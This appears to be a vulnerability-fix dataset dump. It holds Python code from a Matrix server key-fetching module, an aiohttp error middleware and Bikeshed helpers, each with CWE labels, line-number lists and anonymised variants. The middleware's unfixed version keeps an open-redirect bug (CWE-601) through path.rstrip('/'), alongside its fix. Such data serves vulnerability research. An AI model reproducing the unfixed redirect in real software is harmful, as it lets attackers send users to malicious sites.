VAR_0.debug("Got VAR_49 lookup lock on %s", VAR_2)
def FUNC_16(VAR_2):
VAR_53 = self.key_downloads.pop(VAR_2)
VAR_53.callback(None)
def FUNC_17(VAR_30, VAR_1):
VAR_2 = VAR_1.server_name
VAR_54 = VAR_45[VAR_2]
VAR_54.remove(id(VAR_1))
if not VAR_54:
VAR_0.debug("Releasing VAR_49 lookup lock on %s", VAR_2)
FUNC_16(VAR_2)
return VAR_30
for VAR_1 in VAR_12:
VAR_1.key_ready.addBoth(FUNC_17, VAR_1)
self._get_server_verify_keys(VAR_12)
except Exception:
VAR_0.exception("Error starting VAR_49 lookups")
async def FUNC_5(self, VAR_13) -> None:
VAR_27 = 1
while True:
VAR_46 = [
(VAR_2, self.key_downloads[VAR_2])
for VAR_2 in VAR_13
if VAR_2 in self.key_downloads
]
if not VAR_46:
break
VAR_0.info(
"Waiting for existing lookups for %s to complete [loop %i]",
[w[0] for w in VAR_46],
VAR_27,
)
with PreserveLoggingContext():
await defer.DeferredList((w[1] for w in VAR_46))
VAR_27 += 1
def FUNC_6(self, VAR_12):
VAR_15 = {rq for rq in VAR_12 if not rq.key_ready.called}
async def FUNC_14():
try:
with Measure(self.clock, "get_server_verify_keys"):
for f in self._key_fetchers:
if not VAR_15:
return
await self._attempt_key_fetches_with_fetcher(
f, VAR_15
)
while VAR_15:
VAR_1 = VAR_15.pop()
VAR_60 = (
"VerifyJsonRequest(server=%s, VAR_6=%s, min_valid=%i)"
% (
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
)
self.clock.call_later(
0,
VAR_1.key_ready.errback,
SynapseError(
401,
"Failed to find any VAR_49 to satisfy %s" % (VAR_60,),
Codes.UNAUTHORIZED,
),
)
except Exception as err:
VAR_0.error("Unexpected error in FUNC_6: %s", err)
with PreserveLoggingContext():
for VAR_1 in VAR_15:
if not VAR_1.key_ready.called:
VAR_1.key_ready.errback(err)
run_in_background(FUNC_14)
async def FUNC_7(self, VAR_14, VAR_15):
VAR_28 = defaultdict(dict)
for VAR_1 in VAR_15:
assert not VAR_1.key_ready.called
VAR_47 = VAR_28[VAR_1.server_name]
for VAR_43 in VAR_1.key_ids:
VAR_47[VAR_43] = max(
VAR_47.get(VAR_43, -1),
VAR_1.minimum_valid_until_ts,
)
VAR_26 = await VAR_14.get_keys(VAR_28)
VAR_29 = []
for VAR_1 in VAR_15:
VAR_2 = VAR_1.server_name
VAR_48 = VAR_26.get(VAR_2, {})
for VAR_43 in VAR_1.key_ids:
VAR_55 = VAR_48.get(VAR_43)
if not VAR_55:
continue
if (
VAR_55.valid_until_ts
< VAR_1.minimum_valid_until_ts
):
continue
VAR_0.debug(
"Found VAR_49 %s:%s for %s",
VAR_2,
VAR_43,
VAR_1.request_name,
)
self.clock.call_later(
0,
VAR_1.key_ready.callback,
(VAR_2, VAR_43, VAR_55.verify_key),
)
VAR_29.append(VAR_1)
break
VAR_15.difference_update(VAR_29)
class CLASS_3:
async def FUNC_8(self, VAR_16):
raise NotImplementedError
class CLASS_4(CLASS_3):
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
async def FUNC_8(self, VAR_16):
VAR_16 = (
(VAR_2, VAR_43)
for VAR_2, VAR_47 in VAR_16.items()
for VAR_43 in VAR_47.keys()
)
VAR_30 = await self.store.get_server_verify_keys(VAR_16)
VAR_31 = {}
for (VAR_2, VAR_43), VAR_49 in VAR_30.items():
VAR_31.setdefault(VAR_2, {})[VAR_43] = VAR_49
return VAR_31
class CLASS_5:
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
self.config = VAR_8.get_config()
async def FUNC_9(self, VAR_17, VAR_18, VAR_19):
VAR_32 = VAR_18["valid_until_ts"]
VAR_33 = {}
for VAR_43, key_data in VAR_18["verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=VAR_32
)
VAR_2 = VAR_18["server_name"]
VAR_34 = False
for VAR_43 in VAR_18["signatures"].get(VAR_2, {}):
VAR_49 = VAR_33.get(VAR_43)
if not VAR_49:
continue
verify_signed_json(VAR_18, VAR_2, VAR_49.verify_key)
VAR_34 = True
break
if not VAR_34:
raise CLASS_1(
"Key VAR_21 for %s is not signed by the origin server"
% (VAR_2,)
)
for VAR_43, key_data in VAR_18["old_verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=key_data["expired_ts"]
)
VAR_35 = encode_canonical_json(VAR_18)
await make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.store_server_keys_json,
VAR_2=VAR_2,
VAR_43=key_id,
VAR_17=from_server,
ts_now_ms=VAR_19,
ts_expires_ms=VAR_32,
VAR_35=key_json_bytes,
)
for VAR_43 in VAR_33
],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
return VAR_33
class CLASS_6(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_federation_http_client()
self.key_servers = self.config.key_servers
async def FUNC_8(self, VAR_16):
async def FUNC_15(VAR_20):
try:
VAR_58 = await self.get_server_verify_key_v2_indirect(
VAR_16, VAR_20
)
return VAR_58
except CLASS_1 as e:
VAR_0.warning(
"Key lookup failed from %r: %s", VAR_20.server_name, e
)
except Exception as e:
VAR_0.exception(
"Unable to get VAR_49 from %r: %s %s",
VAR_20.server_name,
type(e).__name__,
str(e),
)
return {}
VAR_26 = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(FUNC_15, server) for server in self.key_servers],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
VAR_36 = {}
for VAR_58 in VAR_26:
for VAR_2, VAR_31 in VAR_58.items():
VAR_36.setdefault(VAR_2, {}).update(VAR_31)
return VAR_36
async def FUNC_10(self, VAR_16, VAR_20):
VAR_37 = VAR_20.server_name
VAR_0.info(
"Requesting VAR_31 %s from notary server %s",
VAR_16.items(),
VAR_37,
)
try:
VAR_50 = await self.client.post_json(
destination=VAR_37,
path="/_matrix/VAR_49/v2/query",
data={
"server_keys": {
VAR_2: {
VAR_43: {"minimum_valid_until_ts": min_valid_ts}
for VAR_43, min_valid_ts in server_keys.items()
}
for VAR_2, server_keys in VAR_16.items()
}
},
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
VAR_31 = {}
VAR_38 = []
VAR_39 = self.clock.time_msec()
for VAR_21 in VAR_50["server_keys"]:
VAR_2 = VAR_21.get("server_name")
if not isinstance(VAR_2, str):
raise CLASS_1(
"Malformed VAR_21 from VAR_49 notary server %s: invalid server_name"
% (VAR_37,)
)
try:
self._validate_perspectives_response(VAR_20, VAR_21)
VAR_59 = await self.process_v2_response(
VAR_37, VAR_21, VAR_19=VAR_39
)
except CLASS_1 as e:
VAR_0.warning(
"Error processing VAR_21 from VAR_49 notary server %s for origin "
"server %s: %s",
VAR_37,
VAR_2,
e,
)
continue
VAR_38.extend(
(VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_59.items()
)
VAR_31.setdefault(VAR_2, {}).update(VAR_59)
await self.store.store_server_verify_keys(
VAR_37, VAR_39, VAR_38
)
return VAR_31
def FUNC_11(self, VAR_20, VAR_21):
VAR_37 = VAR_20.server_name
VAR_40 = VAR_20.verify_keys
if VAR_40 is None:
return
if (
"signatures" not in VAR_21
or VAR_37 not in VAR_21["signatures"]
):
raise CLASS_1("Response not signed by the notary server")
VAR_34 = False
for VAR_43 in VAR_21["signatures"][VAR_37]:
if VAR_43 in VAR_40:
verify_signed_json(VAR_21, VAR_37, VAR_40[VAR_43])
VAR_34 = True
if not VAR_34:
raise CLASS_1(
"Response not signed with a known VAR_49: signed with: %r, known VAR_31: %r"
% (
list(VAR_21["signatures"][VAR_37].keys()),
list(VAR_40.keys()),
)
)
class CLASS_7(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_federation_http_client()
async def FUNC_8(self, VAR_16):
VAR_26 = {}
async def FUNC_15(VAR_41):
VAR_2, VAR_6 = VAR_41
try:
VAR_31 = await self.get_server_verify_key_v2_direct(VAR_2, VAR_6)
VAR_26[VAR_2] = VAR_31
except CLASS_1 as e:
VAR_0.warning(
"Error looking up VAR_31 %s from %s: %s", VAR_6, VAR_2, e
)
except Exception:
VAR_0.exception("Error getting VAR_31 %s from %s", VAR_6, VAR_2)
await yieldable_gather_results(FUNC_15, VAR_16.items())
return VAR_26
async def FUNC_12(self, VAR_2, VAR_6):
VAR_31 = {} # type: dict[str, FetchKeyResult]
for requested_key_id in VAR_6:
if requested_key_id in VAR_31:
continue
VAR_39 = self.clock.time_msec()
try:
VAR_21 = await self.client.get_json(
destination=VAR_2,
path="/_matrix/VAR_49/v2/server/"
+ urllib.parse.quote(requested_key_id),
ignore_backoff=True,
timeout=10000,
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
if VAR_21["server_name"] != VAR_2:
raise CLASS_1(
"Expected a VAR_21 for server %r not %r"
% (VAR_2, VAR_21["server_name"])
)
VAR_51 = await self.process_v2_response(
VAR_17=VAR_2,
VAR_18=VAR_21,
VAR_19=VAR_39,
)
await self.store.store_server_verify_keys(
VAR_2,
VAR_39,
((VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_51.items()),
)
VAR_31.update(VAR_51)
return VAR_31
async def FUNC_0(VAR_1) -> None:
VAR_2 = VAR_1.server_name
with PreserveLoggingContext():
VAR_42, VAR_43, VAR_44 = await VAR_1.key_ready
VAR_3 = VAR_1.json_object
try:
verify_signed_json(VAR_3, VAR_2, VAR_44)
except SignatureVerifyException as e:
VAR_0.debug(
"Error verifying signature for %s:%s:%s with VAR_49 %s: %s",
VAR_2,
VAR_44.alg,
VAR_44.version,
encode_verify_key_base64(VAR_44),
str(e),
)
raise SynapseError(
401,
"Invalid signature for server %s with VAR_49 %s:%s: %s"
% (VAR_2, VAR_44.alg, VAR_44.version, str(e)),
Codes.UNAUTHORIZED,
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
20,
34,
36,
54,
56,
57,
62,
65,
68,
70,
73,
78,
82,
89,
92,
93,
96,
97,
101,
109,
110,
111,
112,
113,
114,
116,
121,
124,
126,
129,
132,
140,
144,
149,
152,
155,
166,
169,
170,
174,
181,
184,
187,
199,
207,
208,
210,
211,
212,
213,
214,
215,
217,
219,
222,
224,
227,
229,
233,
235,
237,
242,
243,
245,
246,
247,
251,
252,
253,
257,
262,
263,
267,
269,
272,
273,
277,
280,
283,
304,
306,
309,
313,
317,
319,
329,
330,
341,
342,
343,
344,
345,
346,
347,
358,
359,
360,
366,
368,
371,
377,
378,
380,
382,
385,
387,
388,
389,
390,
395,
397,
401,
402,
403,
408,
410,
415,
417,
418,
419,
420,
421,
422,
423,
437,
439,
440,
447,
453,
454,
457,
460,
463,
469,
475,
476,
481,
484,
488,
491,
494,
499,
501,
503,
508,
509,
510,
520,
526,
527,
528,
529,
530,
532,
536,
542,
551,
553,
571,
573,
574,
577,
583,
586,
604,
606,
613,
618,
620,
626,
629,
633,
644,
660,
664,
667,
669,
671,
678,
681,
693,
695,
700,
704,
706,
709,
713,
718,
720,
722,
728,
734,
743,
744,
747,
752,
758,
763,
765,
777,
780,
783,
787,
790,
795,
797,
800,
808,
809,
810,
811,
812,
813,
814,
815,
816,
817,
818,
822,
823,
827,
833,
845,
847,
848,
851,
854,
861,
863,
881,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
456,
576,
746,
850,
851,
852,
853,
854,
855,
856,
857,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
226,
227,
228,
229,
230,
231,
232,
279,
280,
281,
282,
283,
284,
285,
286,
287,
308,
309,
310,
311,
312,
313,
314,
315,
316,
370,
371,
372,
373,
374,
375,
376,
443,
444,
445,
446,
447,
448,
449,
450,
451,
462,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
585,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
708,
709,
710,
711,
712,
713,
714,
715,
754,
755,
756,
757,
758,
759,
760,
761,
762,
782,
783,
784,
785,
786,
787,
788,
789,
790,
791,
792,
793,
186,
187,
188,
189,
190
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
20,
34,
36,
54,
56,
57,
62,
65,
68,
70,
73,
78,
82,
89,
92,
93,
96,
97,
101,
109,
110,
111,
112,
113,
114,
116,
121,
124,
126,
129,
132,
140,
144,
149,
152,
155,
166,
169,
170,
174,
181,
184,
187,
199,
207,
208,
210,
211,
212,
213,
214,
215,
217,
219,
222,
224,
227,
229,
233,
235,
237,
242,
243,
245,
246,
247,
251,
252,
253,
257,
262,
263,
267,
269,
272,
273,
277,
280,
283,
304,
306,
309,
313,
317,
319,
329,
330,
341,
342,
343,
344,
345,
346,
347,
358,
359,
360,
366,
368,
371,
377,
378,
380,
382,
385,
387,
388,
389,
390,
395,
397,
401,
402,
403,
408,
410,
415,
417,
418,
419,
420,
421,
422,
423,
437,
439,
440,
447,
453,
454,
457,
460,
463,
469,
475,
476,
481,
484,
488,
491,
494,
499,
501,
503,
508,
509,
510,
520,
526,
527,
528,
529,
530,
532,
536,
542,
551,
553,
571,
573,
574,
577,
583,
586,
604,
606,
613,
618,
620,
626,
629,
633,
644,
660,
664,
667,
669,
671,
678,
681,
693,
695,
700,
704,
706,
709,
713,
718,
720,
722,
728,
734,
743,
744,
747,
752,
758,
763,
765,
777,
780,
783,
787,
790,
795,
797,
800,
808,
809,
810,
811,
812,
813,
814,
815,
816,
817,
818,
822,
823,
827,
833,
845,
847,
848,
851,
854,
861,
863,
881,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
456,
576,
746,
850,
851,
852,
853,
854,
855,
856,
857,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
226,
227,
228,
229,
230,
231,
232,
279,
280,
281,
282,
283,
284,
285,
286,
287,
308,
309,
310,
311,
312,
313,
314,
315,
316,
370,
371,
372,
373,
374,
375,
376,
443,
444,
445,
446,
447,
448,
449,
450,
451,
462,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
585,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
708,
709,
710,
711,
712,
713,
714,
715,
754,
755,
756,
757,
758,
759,
760,
761,
762,
782,
783,
784,
785,
786,
787,
788,
789,
790,
791,
792,
793,
186,
187,
188,
189,
190
] |
4CWE-601
| import logging
from aiohttp import web
import os
logger = logging.getLogger(__package__)
def setup_middlewares(app):
error_middleware = error_pages({404: handle_404,
500: handle_500})
app.middlewares.append(error_middleware)
app.middlewares.append(cache_control_middleware)
# Cache-Control middleware
CACHE_MAX_AGE = int(os.getenv("CACHE_MAX_AGE", "30"))
NO_CACHE_ENDPOINTS = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def cache_control_middleware(app, handler):
async def middleware_handler(request):
response = await handler(request)
cache_control_value = "public; max-age={}".format(CACHE_MAX_AGE)
if request.path in NO_CACHE_ENDPOINTS or CACHE_MAX_AGE <= 0:
cache_control_value = "no-cache"
response.headers.setdefault("Cache-Control", cache_control_value)
return response
return middleware_handler
# Error page middlewares
def error_pages(overrides):
async def middleware(app, handler):
async def middleware_handler(request):
try:
response = await handler(request)
override = overrides.get(response.status)
if override is None:
return response
else:
return await override(request, response)
except web.HTTPException as ex:
override = overrides.get(ex.status)
if override is None:
return await handle_any(request, ex)
else:
return await override(request, ex)
except Exception as ex:
return await handle_500(request, error=ex)
return middleware_handler
return middleware
async def handle_any(request, response):
return web.json_response({
"status": response.status,
"message": response.reason
}, status=response.status)
async def handle_404(request, response):
if 'json' not in response.headers['Content-Type']:
if request.path.endswith('/'):
return web.HTTPFound(request.path.rstrip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(request.path)
}, status=404)
return response
async def handle_500(request, response=None, error=None):
logger.exception(error)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| import logging
from aiohttp import web
import os
logger = logging.getLogger(__package__)
def setup_middlewares(app):
error_middleware = error_pages({404: handle_404,
500: handle_500})
app.middlewares.append(error_middleware)
app.middlewares.append(cache_control_middleware)
# Cache-Control middleware
CACHE_MAX_AGE = int(os.getenv("CACHE_MAX_AGE", "30"))
NO_CACHE_ENDPOINTS = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def cache_control_middleware(app, handler):
async def middleware_handler(request):
response = await handler(request)
cache_control_value = "public; max-age={}".format(CACHE_MAX_AGE)
if request.path in NO_CACHE_ENDPOINTS or CACHE_MAX_AGE <= 0:
cache_control_value = "no-cache"
response.headers.setdefault("Cache-Control", cache_control_value)
return response
return middleware_handler
# Error page middlewares
def error_pages(overrides):
async def middleware(app, handler):
async def middleware_handler(request):
try:
response = await handler(request)
override = overrides.get(response.status)
if override is None:
return response
else:
return await override(request, response)
except web.HTTPException as ex:
override = overrides.get(ex.status)
if override is None:
return await handle_any(request, ex)
else:
return await override(request, ex)
except Exception as ex:
return await handle_500(request, error=ex)
return middleware_handler
return middleware
async def handle_any(request, response):
return web.json_response({
"status": response.status,
"message": response.reason
}, status=response.status)
async def handle_404(request, response):
if 'json' not in response.headers['Content-Type']:
if request.path.endswith('/'):
return web.HTTPFound('/' + request.path.strip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(request.path)
}, status=404)
return response
async def handle_500(request, response=None, error=None):
logger.exception(error)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| open_redirect | {
"code": [
" return web.HTTPFound(request.path.rstrip('/'))"
],
"line_no": [
64
]
} | {
"code": [
" return web.HTTPFound('/' + request.path.strip('/'))"
],
"line_no": [
64
]
} | import logging
from aiohttp import web
import os
VAR_0 = logging.getLogger(__package__)
def FUNC_0(VAR_1):
VAR_9 = FUNC_2({404: FUNC_4,
500: FUNC_5})
VAR_1.middlewares.append(VAR_9)
VAR_1.middlewares.append(FUNC_1)
VAR_2 = int(os.getenv("CACHE_MAX_AGE", "30"))
VAR_3 = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def FUNC_1(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
VAR_7 = await VAR_4(VAR_6)
VAR_10 = "public; max-age={}".format(VAR_2)
if VAR_6.path in VAR_3 or VAR_2 <= 0:
VAR_10 = "no-cache"
VAR_7.headers.setdefault("Cache-Control", VAR_10)
return VAR_7
return FUNC_6
def FUNC_2(VAR_5):
async def FUNC_7(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
try:
VAR_7 = await VAR_4(VAR_6)
VAR_11 = VAR_5.get(VAR_7.status)
if VAR_11 is None:
return VAR_7
else:
return await VAR_11(VAR_6, VAR_7)
except web.HTTPException as ex:
VAR_11 = VAR_5.get(ex.status)
if VAR_11 is None:
return await FUNC_3(VAR_6, ex)
else:
return await VAR_11(VAR_6, ex)
except Exception as ex:
return await FUNC_5(VAR_6, VAR_8=ex)
return FUNC_6
return FUNC_7
async def FUNC_3(VAR_6, VAR_7):
return web.json_response({
"status": VAR_7.status,
"message": VAR_7.reason
}, status=VAR_7.status)
async def FUNC_4(VAR_6, VAR_7):
if 'json' not in VAR_7.headers['Content-Type']:
if VAR_6.path.endswith('/'):
return web.HTTPFound(VAR_6.path.rstrip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(VAR_6.path)
}, status=404)
return VAR_7
async def FUNC_5(VAR_6, VAR_7=None, VAR_8=None):
VAR_0.exception(VAR_8)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| import logging
from aiohttp import web
import os
VAR_0 = logging.getLogger(__package__)
def FUNC_0(VAR_1):
VAR_9 = FUNC_2({404: FUNC_4,
500: FUNC_5})
VAR_1.middlewares.append(VAR_9)
VAR_1.middlewares.append(FUNC_1)
VAR_2 = int(os.getenv("CACHE_MAX_AGE", "30"))
VAR_3 = ['/v1/', '/v1/__version__', '/v1/__heartbeat__', '/v1/__lbheartbeat__']
async def FUNC_1(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
VAR_7 = await VAR_4(VAR_6)
VAR_10 = "public; max-age={}".format(VAR_2)
if VAR_6.path in VAR_3 or VAR_2 <= 0:
VAR_10 = "no-cache"
VAR_7.headers.setdefault("Cache-Control", VAR_10)
return VAR_7
return FUNC_6
def FUNC_2(VAR_5):
async def FUNC_7(VAR_1, VAR_4):
async def FUNC_6(VAR_6):
try:
VAR_7 = await VAR_4(VAR_6)
VAR_11 = VAR_5.get(VAR_7.status)
if VAR_11 is None:
return VAR_7
else:
return await VAR_11(VAR_6, VAR_7)
except web.HTTPException as ex:
VAR_11 = VAR_5.get(ex.status)
if VAR_11 is None:
return await FUNC_3(VAR_6, ex)
else:
return await VAR_11(VAR_6, ex)
except Exception as ex:
return await FUNC_5(VAR_6, VAR_8=ex)
return FUNC_6
return FUNC_7
async def FUNC_3(VAR_6, VAR_7):
return web.json_response({
"status": VAR_7.status,
"message": VAR_7.reason
}, status=VAR_7.status)
async def FUNC_4(VAR_6, VAR_7):
if 'json' not in VAR_7.headers['Content-Type']:
if VAR_6.path.endswith('/'):
return web.HTTPFound('/' + VAR_6.path.strip('/'))
return web.json_response({
"status": 404,
"message": "Page '{}' not found".format(VAR_6.path)
}, status=404)
return VAR_7
async def FUNC_5(VAR_6, VAR_7=None, VAR_8=None):
VAR_0.exception(VAR_8)
return web.json_response({
"status": 503,
"message": "Service currently unavailable"
}, status=503)
| [
4,
6,
7,
13,
14,
15,
18,
19,
29,
30,
31,
52,
53,
59,
60,
70,
71,
78
] | [
4,
6,
7,
13,
14,
15,
18,
19,
29,
30,
31,
52,
53,
59,
60,
70,
71,
78
] |
0CWE-22
| import collections
import os
import re
import lxml
def englishFromList(items, conjunction="or"):
# Format a list of strings into an English list.
items = list(items)
if len(items) == 1:
return items[0]
if len(items) == 2:
return "{0} {2} {1}".format(items[0], items[1], conjunction)
return "{0}, {2} {1}".format(", ".join(items[:-1]), items[-1], conjunction)
def intersperse(iterable, delimiter):
it = iter(iterable)
yield next(it)
for x in it:
yield delimiter
yield x
def processTextNodes(nodes, regex, replacer):
"""
Takes an array of alternating text/objects,
and runs reSubObject on the text parts,
splicing them into the passed-in array.
Mutates!
"""
for i, node in enumerate(nodes):
# Node list always alternates between text and elements
if i % 2 == 0:
nodes[i : i + 1] = reSubObject(regex, node, replacer)
return nodes
def reSubObject(pattern, string, repl=None):
"""
like re.sub, but replacements don't have to be text;
returns an array of alternating unmatched text and match objects instead.
If repl is specified, it's called with each match object,
and the result then shows up in the array instead.
"""
lastEnd = 0
pieces = []
for match in pattern.finditer(string):
pieces.append(string[lastEnd : match.start()])
if repl:
pieces.append(repl(match))
else:
pieces.append(match)
lastEnd = match.end()
pieces.append(string[lastEnd:])
return pieces
def simplifyText(text):
# Remove anything that's not a name character.
text = text.strip().lower()
# I convert ( to - so foo(bar) becomes foo-bar,
# but then I have to remove () because there's nothing to separate,
# otherwise I get a double-dash in some cases.
text = re.sub(r"\(\)", "", text)
text = re.sub(r"[\s/(,]+", "-", text)
text = re.sub(r"[^a-z0-9_-]", "", text)
text = text.rstrip("-")
return text
def linkTextsFromElement(el):
from ..h import find, textContent
if el.get("data-lt") == "":
return []
elif el.get("data-lt"):
rawText = el.get("data-lt")
if rawText in ["|", "||", "|||"]:
texts = [rawText]
else:
texts = [x.strip() for x in rawText.split("|")]
else:
if el.tag in ("dfn", "a"):
texts = [textContent(el).strip()]
elif el.tag in ("h2", "h3", "h4", "h5", "h6"):
texts = [textContent(find(".content", el)).strip()]
if el.get("data-local-lt"):
localTexts = [x.strip() for x in el.get("data-local-lt").split("|")]
for text in localTexts:
if text in texts:
# lt and local-lt both specify the same thing
raise DuplicatedLinkText(text, texts + localTexts, el)
texts += localTexts
texts = [re.sub(r"\s+", " ", x) for x in texts if x != ""]
return texts
class DuplicatedLinkText(Exception):
def __init__(self, offendingText, allTexts, el):
super().__init__()
self.offendingText = offendingText
self.allTexts = allTexts
self.el = el
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def firstLinkTextFromElement(el):
try:
texts = linkTextsFromElement(el)
except DuplicatedLinkText as e:
texts = e.allTexts
return texts[0] if len(texts) > 0 else None
def splitForValues(forValues):
"""
Splits a string of 1+ "for" values into an array of individual value.
Respects function args, etc.
Currently, for values are separated by commas.
"""
if forValues is None:
return None
forValues = re.sub(r"\s+", " ", forValues)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", forValues)
if value.strip()
]
def groupFromKey(key, length=2):
"""Generates a filename-safe "group" from a key, of a specified length."""
if key in _groupFromKeyCache:
return _groupFromKeyCache[key]
safeChars = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
group = ""
for char in key.lower():
if len(group) == length:
_groupFromKeyCache[key] = group
return group
if char in safeChars:
group += char
else:
group = group.ljust(length, "_")
_groupFromKeyCache[key] = group
return group
_groupFromKeyCache = {}
def flatten(arr):
for el in arr:
if (
isinstance(el, collections.Iterable)
and not isinstance(el, str)
and not lxml.etree.iselement(el)
):
yield from flatten(el)
else:
yield el
def scriptPath(*pathSegs):
startPath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
return os.path.join(startPath, *pathSegs)
def doEvery(s, action, lastTime=None):
# Takes an action every N seconds.
# Pass it the duration and the last time it took the action;
# it returns the time it last took the action
# (possibly just now).
# If you want to take action on first call,
# pass 0 as lastTime;
# otherwise it won't take action until N seconds.
import time
newTime = time.time()
if lastTime is None:
lastTime = newTime
if lastTime == 0 or newTime - lastTime > s:
action()
return newTime
return lastTime
| import collections
import os
import re
import lxml
from .. import constants
from .. import messages
def englishFromList(items, conjunction="or"):
# Format a list of strings into an English list.
items = list(items)
if len(items) == 1:
return items[0]
if len(items) == 2:
return "{0} {2} {1}".format(items[0], items[1], conjunction)
return "{0}, {2} {1}".format(", ".join(items[:-1]), items[-1], conjunction)
def intersperse(iterable, delimiter):
it = iter(iterable)
yield next(it)
for x in it:
yield delimiter
yield x
def processTextNodes(nodes, regex, replacer):
"""
Takes an array of alternating text/objects,
and runs reSubObject on the text parts,
splicing them into the passed-in array.
Mutates!
"""
for i, node in enumerate(nodes):
# Node list always alternates between text and elements
if i % 2 == 0:
nodes[i : i + 1] = reSubObject(regex, node, replacer)
return nodes
def reSubObject(pattern, string, repl=None):
"""
like re.sub, but replacements don't have to be text;
returns an array of alternating unmatched text and match objects instead.
If repl is specified, it's called with each match object,
and the result then shows up in the array instead.
"""
lastEnd = 0
pieces = []
for match in pattern.finditer(string):
pieces.append(string[lastEnd : match.start()])
if repl:
pieces.append(repl(match))
else:
pieces.append(match)
lastEnd = match.end()
pieces.append(string[lastEnd:])
return pieces
def simplifyText(text):
# Remove anything that's not a name character.
text = text.strip().lower()
# I convert ( to - so foo(bar) becomes foo-bar,
# but then I have to remove () because there's nothing to separate,
# otherwise I get a double-dash in some cases.
text = re.sub(r"\(\)", "", text)
text = re.sub(r"[\s/(,]+", "-", text)
text = re.sub(r"[^a-z0-9_-]", "", text)
text = text.rstrip("-")
return text
def linkTextsFromElement(el):
from ..h import find, textContent
if el.get("data-lt") == "":
return []
elif el.get("data-lt"):
rawText = el.get("data-lt")
if rawText in ["|", "||", "|||"]:
texts = [rawText]
else:
texts = [x.strip() for x in rawText.split("|")]
else:
if el.tag in ("dfn", "a"):
texts = [textContent(el).strip()]
elif el.tag in ("h2", "h3", "h4", "h5", "h6"):
texts = [textContent(find(".content", el)).strip()]
if el.get("data-local-lt"):
localTexts = [x.strip() for x in el.get("data-local-lt").split("|")]
for text in localTexts:
if text in texts:
# lt and local-lt both specify the same thing
raise DuplicatedLinkText(text, texts + localTexts, el)
texts += localTexts
texts = [re.sub(r"\s+", " ", x) for x in texts if x != ""]
return texts
class DuplicatedLinkText(Exception):
def __init__(self, offendingText, allTexts, el):
super().__init__()
self.offendingText = offendingText
self.allTexts = allTexts
self.el = el
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def firstLinkTextFromElement(el):
try:
texts = linkTextsFromElement(el)
except DuplicatedLinkText as e:
texts = e.allTexts
return texts[0] if len(texts) > 0 else None
def splitForValues(forValues):
"""
